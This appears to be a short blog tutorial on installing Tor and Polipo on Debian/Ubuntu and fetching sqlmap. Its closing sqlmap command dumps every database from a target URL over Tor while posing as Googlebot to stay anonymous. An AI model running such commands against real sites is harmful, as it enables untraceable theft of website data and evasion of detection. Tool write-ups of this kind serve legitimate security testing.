There is no better tool at the moment for blind SQL injection than sqlmap. If you don’t use it you should definitely have a look on it. With the latest additions sqlmap supports tor with a command line switch, –tor. Let’s proceed with an installation. My system is debian/ubuntu based but the installation is almost the same for any unix based distribution. Following the instructions, https://www.torproject.org/docs/debian.html.en#ubuntu ,
Add this line to your /etc/apt/sources.list file:
deb http://deb.torproject.org/torproject.org <DISTRIBUTION> main
where you put the codename of your distribution (i.e. lenny, sid, maverick or whatever it is) in place of <DISTRIBUTION>.
Then add the gpg key used to sign the packages by running the following commands at your command prompt:
gpg --keyserver keys.gnupg.net --recv 886DDD89
gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
Now refresh your sources and install Tor by running the following commands (as root) at your command prompt:
apt-get install tor tor-geoipdb
Start tor, with /etc/init.d/tor start and grab a copy of polito config file from https://gitweb.torproject.org/torbrowser.git/blob_plain/HEAD:/build-scripts/config/polipo.conf , rename or move the old file in /etc/polipo/config and use the configuration from the URL.Restart polipo with /etc/init.d/polipo restart.
Get sqlmap from the latest svn trunk using
svn checkout https://svn.sqlmap.org/sqlmap/trunk/sqlmap
Now you can use sqlmap with –tor with the following command,
~/sqlmap# ./sqlmap.py -u http://URL/index.php?cata_id=1 --dump-all –tor --user-agent="Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" and your requests will appear like an anonymous google bot getting information from the website.